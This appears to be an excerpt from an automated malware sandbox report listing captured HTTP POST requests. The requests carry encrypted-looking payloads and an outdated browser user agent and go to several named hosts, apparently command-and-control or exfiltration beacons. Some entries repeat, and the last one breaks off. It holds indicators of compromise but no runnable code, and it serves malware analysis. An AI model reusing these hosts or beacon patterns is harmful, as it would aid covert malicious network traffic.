                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 62 4b 70 38 58 42 43 34 38 78 67 43 7a 76 50 74 6f 36 79 31 6c 63 4e 70 32 67 6b 34 30 47 64 4a 52 4b 43 72 52 7a 4f 44 46 45 42 54 63 48 55 36 43 56 6d 50 77 45 45 44 6d 6e 33 33 79 30 6d 45 6a 61 75 51 65 2b 34 52 77 48 72 4f 68 6b 77 4d 4b 67 46 47 66 36 31 46 49 2f 63 67 67 65 77 6a 2f 4a 72 36 5a 5a 47 35 62 4b 50 77 5a 56 68 4c 56 47 5a 61 48 74 32 78 58 62 70 78 6e 2b 30 6a 35 4e 54 31 51 64 47 54 62 6a 44 4f 69 63 70 57 59 6a 4a 50 51 4f 47 46 79 33 2f 62 30 39 4c 44 52 4d 72 51 6c 39 76 35 62 67 77 68 59 4f 6a 76 4d 70 78 52 64 4a 4d 6e 37 69 79 36 48 6f 59 56 48 51 46 73 68 4a 66 31 74 6d 75 37 37 42 37 4c 51 61 41 65 6f 4e 55 53 39 6c 78 56 4a 64 75 79 46 6a 35 65 6f 67 4a 79 6a 5a 35 6b 6c 32 2f 39 35 74 46 62 59 75 36 79 62 6a 63 36 68 4a 33 36 54 58 75 61 68 61 74 6c 73 52 30 63 32 6b 45 38 66 2f 54 73 54 68 74 42 77 44 6f 64 4b 72 4e 78 34 39 57 48 4a 77 74 52 2f 65 6a 34 74 78 6f 72 35 69 6c 53 4d 61 37 4b 4e 41 4e 58 49 35 2b 49 6d 35 71 49 79 33 4c 61 4f 31 70 7a 33 63 57 68 65 6f 64 52 44 4c 56 54 77 2b 2b 65 2b 7a 79 63 47 7a 57 53 49 58 48 2b 77 6b 4e 73 76 68 51 4a 70 4a 58 64 39 57 4c 74 30 6c 38 4b 73 32 6e 36 51 69 6f 51 54 55 30 44 30 51 35 32 36 53 52 59 76 38 69 2f 77 64 55 46 2b 48 73 51 72 66 76 4d 33 65 42 74 35 74 75 77 46 79 71 4d 4e 67 57 78 70 51 4a 65 46 6a 4a 5a 51 52 53 44 53 6c 53 4c 4c 6e 70 47 61 71 34 2f 37 74 6e 78 4e 52 67 65 72 79 31 52 65 49 66 34 42 58 47 74 46 58 4c 67 35 77 48 49 4d 79 63 51 6c 61 30 38 45 4b 6e 42 68 45 76 4f 74 2b 6d 46 30 42 63 63 62 78 37 58 61 34 4d 66 65 64 45 78 76 76 6f 38 66 4c 52 46 53 6c 68 43 64 48 65 32 34 59 67 6e 67 4b 73 69 51 41 3d 3d Data Ascii: bKp8XBC48xgCzvPto6y1lcNp2gk40GdJRKCrRzODFEBTcHU6CVmPwEEDmn33y0mEjauQe+4RwHrOhkwMKgFGf61FI/cggewj/Jr6ZZG5bKPwZVhLVGZaHt2xXbpxn+0j5NT1QdGTbjDOicpWYjJPQOGFy3/b09LDRMrQl9v5bgwhYOjvMpxRdJMn7iy6HoYVHQFshJf1tmu77B7LQaAeoNUS9lxVJduyFj5eogJyjZ5kl2/95tFbYu6ybjc6hJ36TXuahatlsR0c2kE8f/TsThtBwDodKrNx49WHJwtR/ej4txor5ilSMa7KNANXI5+Im5qIy3LaO1pz3cWheodRDLVTw++e+zycGzWSIXH+wkNsvhQJpJXd9WLt0l8Ks2n6QioQTU0D0Q526SRYv8i/wdUF+HsQrfvM3eBt5tuwFyqMNgWxpQJeFjJZQRSDSlSLLnpGaq4/7tnxNRgery1ReIf4BXGtFXLg5wHIMycQla08EKnBhEvOt+mF0Bccbx7Xa4MfedExvvo8fLRFSlhCdHe24YgngKsiQA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 62 68 6b 57 76 48 42 76 67 68 69 36 45 31 32 63 67 7a 78 6c 56 53 50 34 39 38 55 59 57 77 4b 46 70 43 56 59 32 2f 4b 64 62 69 2b 39 43 54 32 4b 64 70 4e 6c 44 37 74 66 61 48 73 53 36 4c 7a 50 34 6c 77 56 70 6d 51 46 31 6d 70 34 46 36 53 61 56 52 5a 66 2f 33 34 4b 6e 4e 68 63 47 62 73 36 48 6b 69 4a 50 45 4f 57 52 4f 53 78 37 38 66 4e 37 66 30 34 2f 4b 2f 70 74 48 77 6c 6e 6e 57 66 71 6f 76 65 78 53 76 64 41 30 5a 63 75 4b 37 73 6c 74 72 65 33 77 77 33 67 31 43 67 38 43 64 30 42 6a 2b 4d 32 41 69 71 36 47 4b 38 31 5a 78 32 4e 4b 79 61 6d 49 36 34 5a 36 69 57 52 75 4c 69 2f 4f 68 51 5a 56 74 76 4d 6e 42 51 50 6b 64 56 41 47 69 32 4c 51 64 46 57 62 56 78 65 36 4c 4e 70 41 6e 41 34 77 6f 55 48 61 31 73 7a 67 53 6e 59 45 72 57 4e 7a 59 37 67 46 52 64 30 5a 7a 52 71 44 79 6d 69 5a 5a 51 39 31 63 6f 52 56 78 59 33 52 74 31 47 4e 58 6d 52 4d 30 6d 34 47 55 70 65 56 6a 38 66 78 50 49 31 66 53 71 75 4a 34 61 39 6e 65 56 52 77 62 46 2f 6f 4e 4a 61 52 57 77 45 48 41 41 71 50 50 6d 32 6e 54 2b 36 37 30 74 4d 4f 39 4b 69 62 65 47 57 64 41 53 36 44 47 31 58 34 30 78 71 34 50 30 43 74 74 65 4a 69 75 42 48 59 6c 58 56 4c 65 53 77 4b 6f 42 51 65 55 2f 57 62 5a 44 61 54 4e 6c 73 61 6d 6d 52 43 4a 44 50 4c 6b 43 75 64 6c 4b 6d 36 51 71 41 53 55 57 46 31 45 4f 4f 6b 6a 35 74 50 5a 52 38 44 61 76 30 33 46 5a 48 35 50 6e 74 48 38 64 38 61 69 43 4d 74 71 69 72 56 37 75 6e 2b 45 5a 68 66 54 53 63 58 6e 48 46 74 6e 73 4d 76 73 58 32 2b 32 57 43 71 75 7a 61 30 42 71 38 70 30 6a 56 73 31 6e 67 63 5a 52 37 4f 4e 4f 66 62 4c 57 6d 31 32 70 56 31 75 74 79 2f 31 58 44 47 43 47 61 43 41 79 4f 54 72 31 2f 61 47 4d 79 39 47 37 4c 61 2b 76 Data Ascii: bhkWvHBvghi6E12cgzxlVSP498UYWwKFpCVY2/Kdbi+9CT2KdpNlD7tfaHsS6LzP4lwVpmQF1mp4F6SaVRZf/34KnNhcGbs6HkiJPEOWROSx78fN7f04/K/ptHwlnnWfqovexSvdA0ZcuK7sltre3ww3g1Cg8Cd0Bj+M2Aiq6GK81Zx2NKyamI64Z6iWRuLi/OhQZVtvMnBQPkdVAGi2LQdFWbVxe6LNpAnA4woUHa1szgSnYErWNzY7gFRd0ZzRqDymiZZQ91coRVxY3Rt1GNXmRM0m4GUpeVj8fxPI1fSquJ4a9neVRwbF/oNJaRWwEHAAqPPm2nT+670tMO9KibeGWdAS6DG1X40xq4P0CtteJiuBHYlXVLeSwKoBQeU/WbZDaTNlsammRCJDPLkCudlKm6QqASUWF1EOOkj5tPZR8Dav03FZH5PntH8d8aiCMtqirV7un+EZhfTScXnHFtnsMvsX2+2WCquza0Bq8p0jVs1ngcZR7ONOfbLWm12pV1uty/1XDGCGaCAyOTr1/aGMy9G7La+v
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 62 68 6b 57 76 48 42 76 67 68 69 36 45 31 32 63 67 7a 78 6c 56 53 50 34 39 38 55 59 57 77 4b 46 70 43 56 59 32 2f 4b 64 62 69 2b 39 43 54 32 4b 64 70 4e 6c 44 37 74 66 61 48 73 53 36 4c 7a 50 34 6c 77 56 70 6d 51 46 31 6d 70 34 46 36 53 61 56 52 5a 66 2f 33 34 4b 6e 4e 68 63 47 62 73 36 48 6b 69 4a 50 45 4f 57 52 4f 53 78 37 38 66 4e 37 66 30 34 2f 4b 2f 70 74 48 77 6c 6e 6e 57 66 71 6f 76 65 78 53 76 64 41 30 5a 63 75 4b 37 73 6c 74 72 65 33 77 77 33 67 31 43 67 38 43 64 30 42 6a 2b 4d 32 41 69 71 36 47 4b 38 31 5a 78 32 4e 4b 79 61 6d 49 36 34 5a 36 69 57 52 75 4c 69 2f 4f 68 51 5a 56 74 76 4d 6e 42 51 50 6b 64 56 41 47 69 32 4c 51 64 46 57 62 56 78 65 36 4c 4e 70 41 6e 41 34 77 6f 55 48 61 31 73 7a 67 53 6e 59 45 72 57 4e 7a 59 37 67 46 52 64 30 5a 7a 52 71 44 79 6d 69 5a 5a 51 39 31 63 6f 52 56 78 59 33 52 74 31 47 4e 58 6d 52 4d 30 6d 34 47 55 70 65 56 6a 38 66 78 50 49 31 66 53 71 75 4a 34 61 39 6e 65 56 52 77 62 46 2f 6f 4e 4a 61 52 57 77 45 48 41 41 71 50 50 6d 32 6e 54 2b 36 37 30 74 4d 4f 39 4b 69 62 65 47 57 64 41 53 36 44 47 31 58 34 30 78 71 34 50 30 43 74 74 65 4a 69 75 42 48 59 6c 58 56 4c 65 53 77 4b 6f 42 51 65 55 2f 57 62 5a 44 61 54 4e 6c 73 61 6d 6d 52 43 4a 44 50 4c 6b 43 75 64 6c 4b 6d 36 51 71 41 53 55 57 46 31 45 4f 4f 6b 6a 35 74 50 5a 52 38 44 61 76 30 33 46 5a 48 35 50 6e 74 48 38 64 38 61 69 43 4d 74 71 69 72 56 37 75 6e 2b 45 5a 68 66 54 53 63 58 6e 48 46 74 6e 73 4d 76 73 58 32 2b 32 57 43 71 75 7a 61 30 42 71 38 70 30 6a 56 73 31 6e 67 63 5a 52 37 4f 4e 4f 66 62 4c 57 6d 31 32 70 56 31 75 74 79 2f 31 58 44 47 43 47 61 43 41 79 4f 54 72 31 2f 61 47 4d 79 39 47 37 4c 61 2b 76 Data Ascii: bhkWvHBvghi6E12cgzxlVSP498UYWwKFpCVY2/Kdbi+9CT2KdpNlD7tfaHsS6LzP4lwVpmQF1mp4F6SaVRZf/34KnNhcGbs6HkiJPEOWROSx78fN7f04/K/ptHwlnnWfqovexSvdA0ZcuK7sltre3ww3g1Cg8Cd0Bj+M2Aiq6GK81Zx2NKyamI64Z6iWRuLi/OhQZVtvMnBQPkdVAGi2LQdFWbVxe6LNpAnA4woUHa1szgSnYErWNzY7gFRd0ZzRqDymiZZQ91coRVxY3Rt1GNXmRM0m4GUpeVj8fxPI1fSquJ4a9neVRwbF/oNJaRWwEHAAqPPm2nT+670tMO9KibeGWdAS6DG1X40xq4P0CtteJiuBHYlXVLeSwKoBQeU/WbZDaTNlsammRCJDPLkCudlKm6QqASUWF1EOOkj5tPZR8Dav03FZH5PntH8d8aiCMtqirV7un+EZhfTScXnHFtnsMvsX2+2WCquza0Bq8p0jVs1ngcZR7ONOfbLWm12pV1uty/1XDGCGaCAyOTr1/aGMy9G7La+v
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 72 5a 53 4b 49 50 67 6f 5a 68 6d 53 55 33 6e 31 65 39 63 70 4f 2b 74 57 75 67 42 41 46 35 54 4f 72 4f 73 47 55 6f 49 43 6e 45 34 6a 79 76 2b 39 44 31 6d 4f 77 6b 39 61 53 35 30 35 76 73 4c 33 67 74 49 35 76 32 73 45 36 4f 51 73 73 66 6e 47 4e 36 33 35 41 65 56 7a 56 37 48 2b 2b 2b 4f 41 42 33 72 45 75 6b 6e 46 2f 75 48 79 74 6c 78 4a 6c 75 30 56 67 53 6d 6b 56 6a 59 76 30 63 51 69 79 51 6c 59 66 63 61 38 67 4c 59 76 59 4d 63 58 55 33 46 70 4f 63 42 51 50 43 5a 4c 55 67 6c 48 57 76 2b 53 74 64 68 41 47 64 75 73 31 7a 35 66 42 52 56 2f 6a 39 4e 34 4d 5a 39 37 58 43 59 55 38 6a 4a 71 36 53 49 69 67 2f 75 69 37 59 48 72 71 6b 39 2b 31 78 36 65 6e 43 36 7a 42 6d 63 72 35 69 4d 49 6a 37 66 4f 6e 41 77 33 46 71 67 31 47 78 44 4b 5a 50 6f 2f 52 31 4e 53 58 34 32 34 6e 47 32 57 39 52 70 39 77 4a 4f 4a 5a 6c 58 55 4b 56 79 31 2b 34 46 46 58 46 73 5a 51 30 31 4d 75 57 74 4e 68 66 64 51 7a 63 76 6d 58 38 79 69 52 72 6e 4f 52 44 35 67 58 74 44 39 76 66 50 33 75 78 56 34 47 54 45 79 74 52 73 63 53 47 2f 71 37 38 30 47 41 4c 4d 33 2f 54 37 76 72 54 74 68 79 62 47 6b 43 5a 50 44 47 7a 47 61 32 52 54 34 77 5a 50 70 4c 77 70 56 44 79 6e 43 59 53 77 38 4e 41 73 65 5a 4d 43 7a 51 38 7a 79 7a 31 61 6d 4f 36 31 74 47 71 32 46 66 70 66 75 6d 64 30 41 69 68 49 42 34 77 55 71 6e 4e 73 2b 41 4b 74 55 55 36 46 6e 41 70 46 36 77 44 37 31 47 36 4a 56 6d 65 41 2f 6b 42 73 56 7a 76 50 61 51 70 67 6b 6b 39 46 32 51 68 74 47 49 75 4f 4d 47 6d 39 54 7a 44 43 52 46 72 54 75 57 30 6d 50 7a 31 31 68 56 78 37 4a 54 36 46 58 6e 74 36 53 42 43 68 47 67 2b 65 33 33 73 65 2f 69 4f 64 2b 31 47 65 53 53 35 54 65 2f 79 2f 4f 50 34 70 64 56 53 4d 61 71 73 2f 77 Data Ascii: rZSKIPgoZhmSU3n1e9cpO+tWugBAF5TOrOsGUoICnE4jyv+9D1mOwk9aS505vsL3gtI5v2sE6OQssfnGN635AeVzV7H+++OAB3rEuknF/uHytlxJlu0VgSmkVjYv0cQiyQlYfca8gLYvYMcXU3FpOcBQPCZLUglHWv+StdhAGdus1z5fBRV/j9N4MZ97XCYU8jJq6SIig/ui7YHrqk9+1x6enC6zBmcr5iMIj7fOnAw3Fqg1GxDKZPo/R1NSX424nG2W9Rp9wJOJZlXUKVy1+4FFXFsZQ01MuWtNhfdQzcvmX8yiRrnORD5gXtD9vfP3uxV4GTEytRscSG/q780GALM3/T7vrTthybGkCZPDGzGa2RT4wZPpLwpVDynCYSw8NAseZMCzQ8zyz1amO61tGq2Ffpfumd0AihIB4wUqnNs+AKtUU6FnApF6wD71G6JVmeA/kBsVzvPaQpgkk9F2QhtGIuOMGm9TzDCRFrTuW0mPz11hVx7JT6FXnt6SBChGg+e33se/iOd+1GeSS5Te/y/OP4pdVSMaqs/w
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 62 68 6b 57 76 48 42 76 67 68 69 36 45 31 32 63 67 7a 78 6c 56 53 50 34 39 38 55 59 57 77 4b 46 70 43 56 59 32 2f 4b 64 62 69 2b 39 43 54 32 4b 64 70 4e 6c 44 37 74 66 61 48 73 53 36 4c 7a 50 34 6c 77 56 70 6d 51 46 31 6d 70 34 46 36 53 61 56 52 5a 66 2f 33 34 4b 6e 4e 68 63 47 62 73 36 48 6b 69 4a 50 45 4f 57 52 4f 53 78 37 38 66 4e 37 66 30 34 2f 4b 2f 70 74 48 77 6c 6e 6e 57 66 71 6f 76 65 78 53 76 64 41 30 5a 63 75 4b 37 73 6c 74 72 65 33 77 77 33 67 31 43 67 38 43 64 30 42 6a 2b 4d 32 41 69 71 36 47 4b 38 31 5a 78 32 4e 4b 79 61 6d 49 36 34 5a 36 69 57 52 75 4c 69 2f 4f 68 51 5a 56 74 76 4d 6e 42 51 50 6b 64 56 41 47 69 32 4c 51 64 46 57 62 56 78 65 36 4c 4e 70 41 6e 41 34 77 6f 55 48 61 31 73 7a 67 53 6e 59 45 72 57 4e 7a 59 37 67 46 52 64 30 5a 7a 52 71 44 79 6d 69 5a 5a 51 39 31 63 6f 52 56 78 59 33 52 74 31 47 4e 58 6d 52 4d 30 6d 34 47 55 70 65 56 6a 38 66 78 50 49 31 66 53 71 75 4a 34 61 39 6e 65 56 52 77 62 46 2f 6f 4e 4a 61 52 57 77 45 48 41 41 71 50 50 6d 32 6e 54 2b 36 37 30 74 4d 4f 39 4b 69 62 65 47 57 64 41 53 36 44 47 31 58 34 30 78 71 34 50 30 43 74 74 65 4a 69 75 42 48 59 6c 58 56 4c 65 53 77 4b 6f 42 51 65 55 2f 57 62 5a 44 61 54 4e 6c 73 61 6d 6d 52 43 4a 44 50 4c 6b 43 75 64 6c 4b 6d 36 51 71 41 53 55 57 46 31 45 4f 4f 6b 6a 35 74 50 5a 52 38 44 61 76 30 33 46 5a 48 35 50 6e 74 48 38 64 38 61 69 43 4d 74 71 69 72 56 37 75 6e 2b 45 5a 68 66 54 53 63 58 6e 48 46 74 6e 73 4d 76 73 58 32 2b 32 57 43 71 75 7a 61 30 42 71 38 70 30 6a 56 73 31 6e 67 63 5a 52 37 4f 4e 4f 66 62 4c 57 6d 31 32 70 56 31 75 74 79 2f 31 58 44 47 43 47 61 43 41 79 4f 54 72 31 2f 61 47 4d 79 39 47 37 4c 61 2b 76 Data Ascii: bhkWvHBvghi6E12cgzxlVSP498UYWwKFpCVY2/Kdbi+9CT2KdpNlD7tfaHsS6LzP4lwVpmQF1mp4F6SaVRZf/34KnNhcGbs6HkiJPEOWROSx78fN7f04/K/ptHwlnnWfqovexSvdA0ZcuK7sltre3ww3g1Cg8Cd0Bj+M2Aiq6GK81Zx2NKyamI64Z6iWRuLi/OhQZVtvMnBQPkdVAGi2LQdFWbVxe6LNpAnA4woUHa1szgSnYErWNzY7gFRd0ZzRqDymiZZQ91coRVxY3Rt1GNXmRM0m4GUpeVj8fxPI1fSquJ4a9neVRwbF/oNJaRWwEHAAqPPm2nT+670tMO9KibeGWdAS6DG1X40xq4P0CtteJiuBHYlXVLeSwKoBQeU/WbZDaTNlsammRCJDPLkCudlKm6QqASUWF1EOOkj5tPZR8Dav03FZH5PntH8d8aiCMtqirV7un+EZhfTScXnHFtnsMvsX2+2WCquza0Bq8p0jVs1ngcZR7ONOfbLWm12pV1uty/1XDGCGaCAyOTr1/aGMy9G7La+v
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 72 5a 53 4b 49 50 67 6f 5a 68 6d 53 55 33 6e 31 65 39 63 70 4f 2b 74 57 75 67 42 41 46 35 54 4f 72 4f 73 47 55 6f 49 43 6e 45 34 6a 79 76 2b 39 44 31 6d 4f 77 6b 39 61 53 35 30 35 76 73 4c 33 67 74 49 35 76 32 73 45 36 4f 51 73 73 66 6e 47 4e 36 33 35 41 65 56 7a 56 37 48 2b 2b 2b 4f 41 42 33 72 45 75 6b 6e 46 2f 75 48 79 74 6c 78 4a 6c 75 30 56 67 53 6d 6b 56 6a 59 76 30 63 51 69 79 51 6c 59 66 63 61 38 67 4c 59 76 59 4d 63 58 55 33 46 70 4f 63 42 51 50 43 5a 4c 55 67 6c 48 57 76 2b 53 74 64 68 41 47 64 75 73 31 7a 35 66 42 52 56 2f 6a 39 4e 34 4d 5a 39 37 58 43 59 55 38 6a 4a 71 36 53 49 69 67 2f 75 69 37 59 48 72 71 6b 39 2b 31 78 36 65 6e 43 36 7a 42 6d 63 72 35 69 4d 49 6a 37 66 4f 6e 41 77 33 46 71 67 31 47 78 44 4b 5a 50 6f 2f 52 31 4e 53 58 34 32 34 6e 47 32 57 39 52 70 39 77 4a 4f 4a 5a 6c 58 55 4b 56 79 31 2b 34 46 46 58 46 73 5a 51 30 31 4d 75 57 74 4e 68 66 64 51 7a 63 76 6d 58 38 79 69 52 72 6e 4f 52 44 35 67 58 74 44 39 76 66 50 33 75 78 56 34 47 54 45 79 74 52 73 63 53 47 2f 71 37 38 30 47 41 4c 4d 33 2f 54 37 76 72 54 74 68 79 62 47 6b 43 5a 50 44 47 7a 47 61 32 52 54 34 77 5a 50 70 4c 77 70 56 44 79 6e 43 59 53 77 38 4e 41 73 65 5a 4d 43 7a 51 38 7a 79 7a 31 61 6d 4f 36 31 74 47 71 32 46 66 70 66 75 6d 64 30 41 69 68 49 42 34 77 55 71 6e 4e 73 2b 41 4b 74 55 55 36 46 6e 41 70 46 36 77 44 37 31 47 36 4a 56 6d 65 41 2f 6b 42 73 56 7a 76 50 61 51 70 67 6b 6b 39 46 32 51 68 74 47 49 75 4f 4d 47 6d 39 54 7a 44 43 52 46 72 54 75 57 30 6d 50 7a 31 31 68 56 78 37 4a 54 36 46 58 6e 74 36 53 42 43 68 47 67 2b 65 33 33 73 65 2f 69 4f 64 2b 31 47 65 53 53 35 54 65 2f 79 2f 4f 50 34 70 64 56 53 4d 61 71 73 2f 77 Data Ascii: rZSKIPgoZhmSU3n1e9cpO+tWugBAF5TOrOsGUoICnE4jyv+9D1mOwk9aS505vsL3gtI5v2sE6OQssfnGN635AeVzV7H+++OAB3rEuknF/uHytlxJlu0VgSmkVjYv0cQiyQlYfca8gLYvYMcXU3FpOcBQPCZLUglHWv+StdhAGdus1z5fBRV/j9N4MZ97XCYU8jJq6SIig/ui7YHrqk9+1x6enC6zBmcr5iMIj7fOnAw3Fqg1GxDKZPo/R1NSX424nG2W9Rp9wJOJZlXUKVy1+4FFXFsZQ01MuWtNhfdQzcvmX8yiRrnORD5gXtD9vfP3uxV4GTEytRscSG/q780GALM3/T7vrTthybGkCZPDGzGa2RT4wZPpLwpVDynCYSw8NAseZMCzQ8zyz1amO61tGq2Ffpfumd0AihIB4wUqnNs+AKtUU6FnApF6wD71G6JVmeA/kBsVzvPaQpgkk9F2QhtGIuOMGm9TzDCRFrTuW0mPz11hVx7JT6FXnt6SBChGg+e33se/iOd+1GeSS5Te/y/OP4pdVSMaqs/w
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 56 55 32 4a 59 38 6f 59 7a 42 6e 4f 6d 6d 4f 35 4c 62 46 6d 53 59 30 63 4a 54 70 36 49 43 6e 32 6e 67 64 72 51 31 44 32 4d 56 53 33 45 77 53 69 71 33 78 63 56 37 76 71 2f 30 76 33 6f 78 46 43 57 71 7a 5a 71 75 74 56 45 35 30 46 36 4a 75 64 2b 5a 34 66 2b 4b 32 65 51 73 6b 4c 38 39 4a 35 56 7a 36 79 6a 67 75 56 79 37 71 32 61 43 43 30 4f 4e 43 6b 68 66 37 77 31 70 37 54 36 52 44 45 4b 79 2f 38 4e 43 6a 68 67 4d 34 6c 62 4c 49 78 7a 4d 6a 36 66 73 34 61 6c 45 45 54 37 62 65 6b 45 77 62 4a 4a 6a 32 43 67 52 59 67 70 65 33 52 4d 77 30 31 42 45 4e 6a 73 4e 6f 61 64 78 4f 63 68 6b 4c 55 51 6f 55 4c 57 41 30 72 63 58 54 39 52 36 46 70 74 63 61 34 2b 5a 72 76 73 55 50 68 31 54 37 47 2b 70 4d 54 6b 68 75 71 30 54 6a 77 72 30 37 56 7a 57 47 39 50 35 6a 35 70 6c 4d 6b 67 45 45 44 32 77 64 52 36 64 50 68 48 74 42 4a 38 62 44 37 7a 76 6e 69 35 4d 49 46 62 77 76 52 30 46 53 33 39 56 61 43 2b 4a 77 63 39 73 77 37 70 39 44 56 76 2f 48 6e 33 69 52 64 63 4a 6c 56 30 6c 36 37 33 7a 75 73 57 58 65 50 6f 4a 54 59 2b 78 48 43 64 33 78 68 38 67 38 51 6f 7a 6d 45 6b 4a 2b 72 36 42 6a 58 34 74 55 68 32 37 2f 4d 63 39 75 53 65 4e 2f 45 39 46 6d 6b 5a 5a 4e 65 4f 33 7a 6f 53 50 6f 62 74 39 59 46 61 63 6b 59 35 57 51 37 31 34 4c 33 77 71 52 38 7a 33 79 42 4e 65 76 59 4a 69 55 6a 69 6d 36 6f 74 6c 37 53 5a 48 61 69 78 47 64 55 46 72 38 31 36 33 65 57 78 2f 36 53 4c 55 41 78 2b 61 6b 58 4f 34 51 4a 58 4b 4d 51 44 36 6b 4e 72 75 2b 4f 34 46 34 2b 52 47 4d 66 34 5a 36 4c 72 6a 4d 44 79 58 49 51 43 47 50 74 63 74 38 63 6e 78 50 69 4f 2b 4d 41 65 4c 31 79 4a 71 34 79 37 76 51 64 64 52 73 5a 4b 31 47 36 74 59 30 4c Data Ascii: VU2JY8oYzBnOmmO5LbFmSY0cJTp6ICn2ngdrQ1D2MVS3EwSiq3xcV7vq/0v3oxFCWqzZqutVE50F6Jud+Z4f+K2eQskL89J5Vz6yjguVy7q2aCC0ONCkhf7w1p7T6RDEKy/8NCjhgM4lbLIxzMj6fs4alEET7bekEwbJJj2CgRYgpe3RMw01BENjsNoadxOchkLUQoULWA0rcXT9R6Fptca4+ZrvsUPh1T7G+pMTkhuq0Tjwr07VzWG9P5j5plMkgEED2wdR6dPhHtBJ8bD7zvni5MIFbwvR0FS39VaC+Jwc9sw7p9DVv/Hn3iRdcJlV0l673zusWXePoJTY+xHCd3xh8g8QozmEkJ+r6BjX4tUh27/Mc9uSeN/E9FmkZZNeO3zoSPobt9YFackY5WQ714L3wqR8z3yBNevYJiUjim6otl7SZHaixGdUFr8163eWx/6SLUAx+akXO4QJXKMQD6kNru+O4F4+RGMf4Z6LrjMDyXIQCGPtct8cnxPiO+MAeL1yJq4y7vQddRsZK1G6tY0L
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 49 55 4e 77 63 68 47 33 48 78 70 59 36 2f 2f 5a 73 41 57 6c 45 32 6f 64 77 6e 37 50 52 55 49 57 31 66 34 70 4e 56 39 63 6a 55 6c 76 36 56 4d 78 68 4f 70 72 63 72 37 42 70 44 57 31 54 37 39 47 6d 68 64 73 49 6e 46 6c 75 48 57 78 6a 35 35 73 68 79 41 35 77 31 68 65 46 6d 31 5a 4c 32 33 49 5a 67 65 47 7a 42 30 33 6b 47 46 4c 72 62 44 42 6e 74 6b 37 2b 4f 2b 6f 38 41 2b 31 47 47 6d 2f 74 57 77 55 65 69 4e 6f 4c 68 72 4a 4a 31 47 6f 65 4a 46 43 37 51 4e 39 52 45 7a 45 32 44 6b 72 68 39 73 71 64 4d 64 6e 57 2f 54 45 2b 39 4b 55 6d 51 69 52 62 65 30 41 74 5a 47 50 62 47 75 30 37 39 35 2b 6f 63 5a 47 71 76 2f 32 5a 58 53 39 56 61 37 44 50 35 54 69 6b 61 4b 70 74 6a 44 43 41 6f 61 56 36 45 39 55 5a 6e 49 4a 46 38 5a 39 73 58 4c 45 58 69 49 4e 6f 4e 44 39 54 66 62 44 65 42 45 45 2f 2b 30 32 33 70 56 4d 53 70 6d 31 33 5a 2b 56 41 55 46 65 4c 79 77 79 64 5a 4f 55 70 66 38 65 33 56 42 46 77 43 48 73 6d 47 58 47 61 56 61 56 46 2b 6d 6b 62 6a 4f 43 4b 4a 5a 65 56 77 4b 2b 70 51 6d 43 71 59 79 69 57 6b 4a 75 64 4d 2b 48 39 78 49 78 54 4a 52 39 45 69 36 30 78 75 48 6a 66 6b 58 44 63 54 39 66 4c 75 76 33 67 75 68 61 51 36 4c 46 68 6e 4b 55 53 75 74 36 49 45 44 6c 36 47 39 73 35 48 78 59 55 6d 33 66 79 67 56 49 4d 53 42 69 54 64 46 70 4a 41 43 62 59 35 34 38 51 32 63 56 61 57 4c 55 36 49 42 7a 78 6e 73 72 62 75 36 31 34 38 37 71 6b 70 4b 59 31 34 5a 55 59 47 42 68 7a 72 6c 72 62 32 33 42 50 62 74 55 34 49 54 79 77 6c 7a 34 6c 52 58 51 4b 55 37 37 4f 57 79 77 43 69 49 41 55 35 72 34 7a 75 65 6d 55 4a 6d 2b 6e 52 67 6a 78 48 77 4a 4b 30 49 2b 48 48 73 51 75 51 6a 30 4d 4a 79 41 38 32 6d 62 77 33 77 45 4e 38 55 42 69 58 56 30 61 4f 58 78 6f 79 2f 30 4f 51 30 6e 2f 68 41 30 4c 36 34 49 51 79 50 32 5a 6c 78 52 59 4a 51 62 65 6c 34 78 53 38 73 38 31 61 41 34 41 5a 77 3d Data Ascii: 